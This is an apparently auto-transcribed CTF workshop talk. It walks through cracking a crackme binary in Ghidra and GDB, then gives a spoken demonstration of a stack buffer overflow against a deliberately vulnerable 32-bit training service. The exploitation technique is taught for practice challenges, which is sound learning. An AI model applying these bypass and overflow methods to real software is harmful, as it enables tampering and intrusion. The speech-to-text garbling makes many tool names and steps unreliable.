VM for dynamic like we're not going to execute it. But now Ghidra has a debugger so you can execute it. So I would advise Ghidra inside the VM makes sense. So I'm going to use non shared project because it's simpler. Where was my up here we go crack me. And then Go I wanted to find Godbolt to go to Godbolt. So it's on the God, I don't know about that one. So and and these online tools are really cool for CTF because you don't care about the content of the file it's not like your company information. But be careful with like company files on services like that because you don't pay you're not paying and you're sending them binaries so you know if it's your products I wouldn't use something like that. We will let's try that it will probably like solve the challenge like that right. Yeah. So I'm not going to use that for now. I'll put that aside. Okay. And and Ghidra every year I do the same crack me every year Ghidra is getting closer and closer to having it solved like just looking at it. It might be the year that it will do that. It might be the year that it will do it entirely. So Ghidra is UI is a bit confusing so we created a project but there's nothing there you need to import is basically the first step is zoom. So everything starts with an importing files. Just kind of the, the opposite way of either and and crack me. We're importing it it detected that it's an alpha so the next executable and then the dragon to chew on it. Yes, analyze it please there's a lot of options just analyze. Now it's finished so it's a relatively small binary. And now we can take a look at the what what happened so executable have things that are exported by default. And you want to analyze the binary basically you need to start somewhere right and some like a hello world in C gets compiled on Linux gets compiled down to I think it's a 16 or 4k executable. It's now the what the C library and compiler ads is huge. And so even though start looks like the start of the your code. It's actually like libc wrapper that does whatever it's not interesting. So you need to find like what is your real entry point. And so you have a start main here and a main here symbol so let's double click on that. Oh, now we're we're at something interesting. So we have a main has variables at Prince performing intense computation is a function called dramatic. Good. Then there's a compute it prints the beginning of a flag it raise. And then there's a loop doing a calculation and a put chart 10 10 in X in char is backstation. So basically this is just a new line. So we have here something basically that prints a flag. So if we can have access to the L bar one variable. We probably would have the flag. Now what is that raise call right. It's weird. And since L bar one is returned by compute maybe we can know what's going on here. So what we have is stack variable so local variables and long things that look a lot like. Printable characters but that did disappointingly doesn't show as printable character. So it's not I'll still be doing that demo is clearly they're not figuring out stack strings. It's okay. It makes my challenge last longer a better lifespan. But so at this point someone smart or experienced will be like, oh, how can I go back. Will be like, if, if I skip that raise, I will have the flag because there's a this is raising a signal signal can be caught or ignored by the operating system. So let's try running the binary and see how far we can get. So I'm using a hybrid approach now. New, new, new time I'm doing it first time I'm doing that. So to execute a file that you downloaded on Linux you need to make it executable it's not executable by default. So I'm adding. I will have executed execution right. So this is shown here. Now if I run the crack me, I have performing intense computation. And then a corridor. So flag and then segmentation fault. So this is clearly the signal. I'm going to wrap around and start it with GDP. So the GNU debugger, the default Linux debugger. And I have a GDP plugin. I strongly advise people to if they're serious about doing exploit or crack knees to use a GDP plugin. GDP by default is not is built for people who have source code not built for reverse engineering or expectation. So, so a plugin will really help the vanilla GDP. That doesn't show you assembly doesn't show you stack doesn't show you anything so it's just not helpful. So I use Tony BG I'm surprised that it works still not doing that often. And so I launched the program but by default since it could be malware it will not run it. So I need to run it. I think so I'm going to do. And then I have my performing intense computation. And I see what I see here is the state like this is what's not shown by default. So I have program received signal. So I so this trip the debugger so I still have control of the program. And it shows me the state of the registers. The disassembly of where I am I am at this position in the executable. And this is inside the lip see I believe, and I have the state of the stack. So we see that there is a string that we haven't seen before that is on the stack. And then there's the backtrace so these are the calls so I so you know start main called something called main called raise, and then I'm here. In rays. Now, we can ignore a signal. The way to ignore a signal is by pressing continue. And we have the rest of the flag. So that's a crack me worth one point. So this is the easiest way to solve that challenge. You could also write the instruction pointer to try to skip the problematic code. Am I going to try that. Are you good with GDP. I need to like specify content to a register. I haven't done this in a year. I'll try yellow. So run. Jam somewhere. I mean this is interesting for one on one because it puts you in the state of mind of the what how the machine works. And it gets you close to the metal and understanding how things happen. So, why are we executing stuff. It's because an instruction pointer is incremented. So the instruction pointer is incremented by the computer and it will fetch the next instruction. So. What's the question. Except that register. That's good. I'm going to Google it but I'm going to do the theory first. So our IP is the instruction pointer. So this is somewhere in the CPU has this address and this address is the code that is being executed. And so what we want to do. Oh, I went too far. What we want to do is to basically put. Oh, I'm going to shoot down raise. So. Break main run. And now you can. You can run instructions by instruction so now I break I break point into the main so I'm in the main function but we know that there's a lot of stuff that will happen before and you can always use you know, I'm going to run this code up to a specific point that I don't see yet. So, we could break on. We can do that. And then run up to that point. We can. Next. So I so by using next you step over the call and step over the call. Yeah, so by using next you step over the call instead of stepping in the call. And I will, I will, and then when you press enter you basically reissue the last command so I'm going to try to step over the call. So the compute is a long function so it took the time to execute and output the dots. Not compute sorry the dramatic. Compute should be fast. And the other the raises here so we're going to break on it. Because it's an address continue. Okay, so now we have the spot that we want to bypass. So what I'm going to do the instruction pointer you can see is exactly at this point. Now what I want to do is I want to set our IP to be the next thing. So it will never execute when we say continue will never have the stack trace. You'd use the jump instruction to set it and continue. Okay. Can I do that. By way. So say, Mr. say offset. So he's saying like you can put the address but you can put a cute way that will be more easily rememberable. But you'll see when I will start looking at the hard variant or why this is not something you can always afford to do. But it will be resolved symbolically like that why I need to see things. All right, so we jump at that so we skip the stack the signal and we got the print. Now, and it exceeded, exceeded normally so we skip the, the what was causing it to crash. So again, you know, many ways, we can also patch it we could like not so the car to raise takes, I don't know a couple of bytes. We can not these replace these bytes by 0x80 not 90 0x90. And, and then when it will execute this and then or we should skip actually these two, because this is preparing the call. So we should skip these two override these two by 0x90. And this will just slide so it will call and then this will not exist anymore and then it will move and jump and whatever. So there are many ways to approach a problem like that. Now, if we want to do it statically from guide, we need to figure out what's going on here. Here we see that there is a show on call. So basically, this long ass string, which may be backwards, could work. No, it's confusing. So this is basically a string that is being fed to a show on hash and then so the flag is actually the show on of something. We cannot get to that something here. Maybe we could do it dynamically in GDP, we could stop at the right place where that string is assembled and and figure out what it is. So we can run break on compute. Continue. Are we on compute? Not necessarily. No. Next as a continue. Where are we compute. All right. So. Next. Okay, I skipped the first part. Okay, so area. So the last instruction, this instruction here. Put that X in the CPU in the X register, and you can see that this is there is. So if I want to take a slow approach, I could start writing down the various content of that and putting it somewhere. I'm going to do a new notebook. So there is. And then continue. Where is it? RDX. So the RDX is here. So no way with spaces. No way. Oh, it's here. There is no way. You are. Our. There is no way. There is no way you are ever go. He. So it got combined or it figures that this is just a long string. What does it look like? Okay, now it's going to add it. There is no way. You are ever going to find. Figure. We'll maybe lose it. We'll write it down. With the. I just put this. This. Whoops. Yeah. So. But so before we do anything with the stack. So and this will happen after the string length for sure. So we can. Do a next again. And now I think we have completed. The string. So again, the string is added. Push to the stack. So the stack is shown here. And what we're doing here is that we're saying, show me content of memory. As a string. So slash s means as a string at dollar RSP is the value of a point thing by the RSP register. That is this address plus 10 in X. So how did I find the plus 10 and X is here. It's the this here is 10 X. So by doing so. Now we have there is no way you are ever going to figure this out. Okay. I have that string. And now, if we want to. We now that we have the string, which was the hard part with with. Now we have that string. We know it's doing a string land allocating some memory doing the show on of the string. And then returning. So what we're going to do is the MD for show on someone some okay. So I'm we're going to do echo this pipe into show on some I could do it and Python but it's going to be longer. So we're going to do that instead and self documenting my solution, maybe lacking a couple words here and there. And now we're going to try with submitting this with the flag beforehand. And it's incorrect. So, The echo does add a new line at the end of the string should have remembered that. And so, because of the nature of hashing this will output a very different executable. This will generate a very different hash because I would like to verify it but I'm going to just forgot. Cryptographic hash the strength of a cryptographic hash is that to be entirely different based on a little variation of input. So this is what happened there was missing or echo was adding a new line. And this code wasn't. And by removing it we get a completely different hash. I'm going to try it. If that's our solution. And we got the flag. Now, let's put it in the decompiler. Can I show just this one. Okay. The computer function is just code. The computer function is just code. No, no, no, no, no, no, no, no, no. That's right. Now, now, I'm Indian. That's right. I have it installed me. I've never used it. I saw someone at an event I actually know one of the guy who worked on that. Well, it will. No minute to online the webpage. So, okay, that's a very powerful thing that I will remember for sure. And so now one thing. So this, unfortunately, no matter how hard it looked like, this was the easy mode, because the binary was not stripped. So, all of the strings like main and compute and everything that was the name of a function is there because it helps the bugger understand the binary program. And production binaries are most often stripped because it makes the binary smaller. Then we'll take a look at what it looks like it's a different beast. I need to download it first. For for. So the difference is like we go like if we look at the export. If we look at the exports, they are they are very different than the than earlier right we have two functions that were identified standard out which apparently is an export. Not sure why functions we have the functions are like all unnamed functions, but the assembly or decompiling tools are meant for are built for that for you to rename. So now I'm going to try to find the main. Not sure. Okay, so this is the main right libc start main. And this is still a named function because it's part of the libc and it, the tool knows that it's that because of the way the elf is structured and loading. Now this is here are real main. And so the practice of reverse engineering is basically taking this saying rename function, writing main, and you can have your own naming convention like when you're unsure you underscore or is Z or maybe or whatever, and you try to go as fast as you can to confirm if it's clean or not, but now look at this here like the, the, the printer is part of the library API so it's there clean, but our dramatic our computer. Everything has been like hidden away. So if we look at this, it's still, you know doing the same shower thing, but now there are no addresses that can be used to figure out. And when statically, you know you give it names and you move around. It's not too bad because it will remember the name that you've given to stuff, but then when you switch to your, your decompiler, your debugger. Things are a little bit harder, because I need to make it executable. Things are a little bit harder because you cannot do break main, you don't have a main. So you need to figure out where is the entry point. This is remember gdb finding entry point info file info file. So now you have entry point is there. So then I think the entry point will always be if I run I will be in the entry point. No, it ran. So it ran up to the crash in this case. So if you want, if you if it would be malware, this would have been a mistake. Let's try again and do a break point on whoops. There are no symbols so I can this as main anymore, but I can this as the entry point. So info file can this as this, but this is why I like whoops. No. So this is why I like on DBG or other modules like that is I would break on the address, and then I would run until the address and then I will have something to then move and work around. But this is not our main yet. And it's still not unclear. And I think this is kernel address space. But don't quote me on that. I would next. Whoops. Step, step instructions continue. I don't know what I'm doing. I will try to, I guess, break elsewhere. The previous way to solve it still works no matter if debugging symbols exist or not. And this was the only difference between the easy and the hard is not nothing in the code is different. It's just that I stripped the symbols from the binary, which by definition makes it harder. But most reverse engineering or crack me or poem challenges will be built like that to to to make it harder for you. But but then you still have as you walk around, you still have some strings to help you figure out what's happening. And there are tools, I believe that synchronizes the whatever you do in Ghidra. You will have in GDP. Same with either. So, so if you rename a function there you will have it in GDP. These are complicated to set up. So if you do some. Basically people working a lot on reverse engineering or crack me's or exploitation challenges should spend time oiling their tool chain to make sure that stuff like this is is is workable and possible. And there are a lot of good tutorials online and tone a dbg this specific. Gdb plugin does have a bridge for either. That that should help you be faster at doing this. By the way, for the binary. Yeah, it's 64. Yeah, people used Ali dbg a lot before, but it's 64 since six years has been a solid alternatives alternative. But sometimes Ali there's something about Ali like for Packers, for example that Ali just never breaks. But I think it's 64 is really reliable and used by the industry more and more. There's also when dbg it's harder to use it. It's kind of like gdb, but it is the one provided by Microsoft to debug their own stuff including kernel code. So, but it's, it's a lot less user friendly than 64 dbg. So again, you know, make sure you try both. And I know like these references might be hard to to to remember, but I'm going to do a deal with you here everyone's still here or on the stream. If you come and see me during the CTF I will be there the whole weekend. And you're like, Hey, what's the name of the tool I will happily like give it to you again. Like this is not. This is not cheating. This is just like I told you it just that I didn't have slides so you don't have take a ways except just three hours of me ranting. So, I'll happily give it back and give the good one oh give me the context of what you're trying to do I'll give you the pointers to the tools. And you can do that with the guys here as well this is will not be considered cheating. We're we're on YouTube. So, but but so for the weekend. We might have a you, you too but it will be a raw on it on edited. You have to yeah I have to go through it and find the parts you're interested in. That that's it for me or is it how long how many 36 minutes. I don't think I want I want to get into the exploitation. Do you want me to do the exploitation. It's a bonus. Okay, I'll do it. Yeah, no expense explanation it's because I it's a this is like medieval level OSCP from 10 years ago. Exploit, it's a stack smashing it's not modern at all, because there, since then a lot have changed to prevent bugs like this in compilers in in in CPUs and all that. This is kind of as fake as it can be. But let's try, let's look at it. I have 36 minutes and I'm rusty. Okay, exploit. So most exploitation challenge starts with a service. It's usually text-based because it's very minimalistic. And the goal is just to write to memory and then the computer go in that memory and execute what's in it. So here we have a serial number checker. We're gonna do a test. So this sorry wrong serial number. Then we're gonna do a classic. And then I'm not having a wrong serial number. I crashed it. So there's something broken here. I need to figure out what it is. We get the service again. And this is because we run it in a mode where it will restart on the next connection. So then you can hunt for the right length where you crash it. So you see like between these two lengths, I'm crashing it. Now the source code is provided and the instructions to compile it as well. Well, let's download the source code. So we have a compute function. We have a validate function. There is a session enter your serial number. We receive from the network. There's a success and then a confirmation number or wrong serial number runs on one, two, three, four, five servers ready and it's forking. So this here. Okay. So it says on what it runs. This is important to have reliable addressing. This is one reason why Linux is harder to exploit than Windows because it's more, when you do exploitation, you need to have a great understanding of the state of the memory. And on Windows, since it's all pre-compiled and the same thing, every Windows version is like the same. Whereas on Linux, you need like the exact one because there's a new version every six months or so. So this information is kind of valuable if you want to exploit it quickly. Now, in order to do local testing, we will need to be able to compile it so create a fake service file. Do I run? Is there still a docker for the docker? I'm wondering if it doesn't take me as a vagrant because it seems I didn't succeed. What do you think? I'm going to have access to the local file. Just what? Just point? Just what, host? Just the two points? Two points. And then, go down. Oops. No, but I don't stop my docker by default. I don't stop my docker all the time. And sometimes, once I got my hands on the computer, I was running WordPress on the internet, and I was like, oh, excuse me for people on the stream. Unable to find... Oh, it's still there. I thought that they... Because if you look at the... Here, like they don't list 14.04 anymore. That's why I thought they could have. They don't list the old images. Well, I need a compiler. So we're spinning the exact version of that operating system. We are installing stuff to compile. Good memory. Then, they're probably pointing to a slow archive that still works. Okay, so we're installing stuff to be able to compile. Then, then, then our instruction. So we need to do put this in services.h. Otherwise, it won't compile here. So this is out of the docker image. Oh, I'm just a bomb. And this is inside the docker image. Then compile without. So we need to put no stack protector because the compiler has that detection built in now. This is why I was saying it's a very old technique to show how to smash that stack. And I'm missing stuff. A kernel image or... Oh, okay. No, but this is to do 32.04. Oh, well, docker. Yeah, he's going to take the same architecture. Good point, good point. I'm glad I have helpers. Because sometimes, you lose hours and stuff like this. Okay, I have service. Can run it. I'm going to map it and then it runs. Because if... Oh, but what? Since it does the same binary... Oh, my hostname is changed. Okay, so again, now we're giving it network access. And now, do I have this? I'm going to install that as well. Terminal multiplexer. If I want to debug it, it's going to be useful. So service... This is usually when you have a 32-bit to 64-bit problem. What? You think I lost it? Yeah, yeah, I understand, but I'm a bit traumatized. It said, if I close the container, I'm out of it. Shit. Yeah. Yeah, but now it's... Okay, I hope I don't have to recompile them. No, no, no, it's app update. I told you I didn't want to do this, by the way. So you're here, you're here. You're stuck when you... Apple, Apple, well, we can look at the source code in the meantime. So this is, I think, where the magic happens. A pointer and a copy to a buffer of a limited length. This is terminated, so it should be good. This one is not. So here is the bug is here. Okay, server runs. Now can I connect to it? Yay, okay. So what's cool about that is that we can debug it. Of course. Why? Is there a reason? Because it's a binary, it should work. Linux and its legendary compatibility. Ah, Chris. Ah, fuck off. No, no, no, it's just too complicated to install. Wait, we're going to drive it. No, it works. Okay, we're going to do that. So the container is meant to compile the binary. It will work on the system on... But this is why you need a vagrant. This is going to be 64-bit addressing. And the bug is not, I think the bug is 32-bit only. I think this is why I need a vagrant. Oh, I'm going to look completely out. So this is, so I used to teach this like 10 years ago. And this is what I was using to explain the solution. So we, yeah, one of the first complexity is that there's a fork call. By default, GDB will not follow the fork. The child, it will stick on the parent. So we need to get rid of, work around that. Now we could add symbols as well with GDB3 and then follow fork mode for child. And with the symbols, we can break on the sessions. Now, yes, yeah, you need to compile it on a specific on Ubuntu 14.04, otherwise, no, or it might, or it might, but you'll have like my answer because my answer is just one string and boom, it blows up, right? So the flag is not, even if you compile it, the flag is on the server. So whatever you'll find locally to exploit will not work on the server because it's going to be a different thing, which means a different memory address. Same principle, but you won't grab the flag. So this is why you need to mimic the target so that it will work. So the, yeah, so here the flow, as I was saying, the second string copy here, it copies to a buffer of eight, but the source can be up to 18. So you will override and since value two is below value one, you override, no, sorry, since buffer is below the integer values, you override the memory going upwards, which means that you can smash value one and value two at this place. So you have effect on value one even if you are after. So the goal, the way to solve this challenge is to use the buffer overflow to make sure that you will override value one with something that you know will match value two and value two, you are in control of it because it's whatever your buffer is and this out of the compute function. So in the debugger, if you send, like we often see sequences of A's, but it's more useful to use different characters because then you know you're at this position or that position. There are tools in PwnDBG that will or Radare has tools like that as well that generates the sequence of a length that you specify, but here we've done it by hand. I don't recall what they are. So when we look at the string copy, this is what the memory looks like when you have that. So you can see 41, 42, 43, 44, 45, 46, 47, 48. And if you look at the buffer, this is the content of the buffer. Then value one is this, value two is this, now after you run value one, that's the state of the buffer. Man, I don't remember any of this. And value two is this. So they are very different. Like, and it changed drastically after the overwrite. So buffer will receive SN plus nine. So here SN plus nine will be what's sent to buffer. What's complicated is that there are infinite number of solutions because you need to have two things. One thing that you control that you send, it will be cut into ransom compute and it will be compared to one another. But some of it you use to overwrite one of the values. So you need to align them. So the solution we are, you know, narrowing into is one of the many solutions that could be. So if we smash value one, we can make it so to pass the test. Validate will be true. So now we did like fake tests if you want. So, you know, value two is this, value one is this. So we're not quite there. And also you have to avoid non-printable characters. So try different input, iterate on what you send until everything that you need, that value two is printable characters so that you will be able to overwrite value one with printable characters. Doesn't it stop only on the Vaxxas zero? Oh, okay. So yeah, there are a handful of them that will stop the copy. So basically the ABCDEFG payload, you know, got us there, but we cannot progress with it because this will generate after it goes through Validate, not Validate Compute, it will generate non-printable characters, which means that it's not a good payload for the exploitation. Now if we send many As, you will go and get into a mode where everything is ASCII. So value two, everything is ASCII. Now that we control value two, now that we know value two, everything is ASCII, we need to just adjust our payload so that value one will match value two. And we can do that locally because we have access to the, we can debug the program. And again, I mean, this is like the shittiest, I did it that way at university. This is how I write it up. And with like, this was before anger. I'm sure in anger, someone who knows how this thing work will like solve this like this. Anger, just basically, you know, does all possibilities and finds the one that narrowed down to the state that you wanna be in. It's just, I've never used anger except taking in a workshop, never used it after. So I would need more work. This is why it was a bonus. Like I need to be, to prepare more in order to teach it better, but you'll still have the solution. But so in my testing, I arrived at a payload that I thought would work by doing the math, but there was an issue. So I was obtaining something slightly different. But if you invert the two value and you add the A, then I arrived at a payload that worked. And this is basically the exploit for that challenge. It will get it in the state that you need to be in. So I can show you, but I mean, the better way would be to debug it, but the error I'm getting, I'm not convinced that by running it on a 64-bit system, this solution will work, but we can try. Yeah, I don't know if I wanted to do a local payload, but it wouldn't work on the other. Oh, yeah, that will work. I've already done it. No, but I want to try to crash. I don't want to do the solution yet. I have 11 minutes left. We've got a hammer, he's getting my stuff. You're right. You're right. You're right. You're right. You are correct, sir. Okay, let's try to run it. So now I've shown you the solution. We're going to wait until the end for the money shot. So now I'm going to try it in the 64-bit environment. We'll see what it looks like. We'll try to go, but I'm not convinced that we're going to progress much in 10 minutes. But what my son was saying is that I need to do all of the set follow-forward mode, whatever, to be able to put it in the right state, where I will follow the child. And then I could run it, but not sure what it will look like without symbols. Okay, so it's dying. And can I connect again? Yes, okay. But I don't have any breakpoint. Do I need to use a 32-bit GDB? Google. GDB 32-bit mode. Let's compile with this bot. Okay, you see my search more quickly than I do. Error, disabling, address space, randomization, operation, not permitted. No, no, but the darker, more or less privileged, surely. But even if it doesn't randomize, it's not serious because I don't pass it. It's a local smash track. A local smash, it should work. It's GDB. I think it's GDB. Because GDB has to try to disable that. Okay, we're going to copy it. Yeah, that would be the trip, the debug. Yes, one minute. Let's paste the payload. Okay, so the service is running here. Ah, stack corruption for the win. So, I mean, I wish I had something better to show you, but what happens is that we, again, like from the source code here, we are providing a buffer that is too large here. And the first string copy is fine because there is no pointer, no byte that is injected in the original char buffer that will make the string copy and after a fixed amount of characters, that is the size of the buffer, then value one is computed. We have no control over any of this besides the regular first part of the serial number. Now, the second string copy arrives and to a new buffer, like we're kind of reusing one variable here. But then we copy from the ninth position where nothing was made to ensure the length of the thing, besides the, like it's accepting between this and that. So, then this copy will overwrite content and it will overwrite up. So, the stack is both value two, value one, or both value one, value two. But so you are overwriting content on the memory and then value two is computed. So, no, yes, you override value two and value one, but value two is then rewritten. So, then you have to make sure that whatever is rewritten here and whatever you overflow there is equal and must be printable characters and the way to achieve this is when you have a lot of A's through the validate function, the compute function, sorry, will create this value, I think this value. And yeah, so, yeah, this one was extracted from a run. And so, this is when we figure that we need to put this at the end, but it turns out that it was not long enough or whatever. So, I like and when looking at it, you realize that the two characters are inverted here. So, you flip them in the right order and then you pad by two other A's and then you get the answer. And if we do the mash, corruption for the when yay, I completely cheated. Oh, two solves. Someone from here, you figure it out or you copy? Because I was gonna say next year you're here. Okay, well, thank you so much everyone. It's been quite a ride. And now I must have a honestly, I hope you have a great CF and if you have questions, I do not hesitate to come and see all of us. We're here to learn.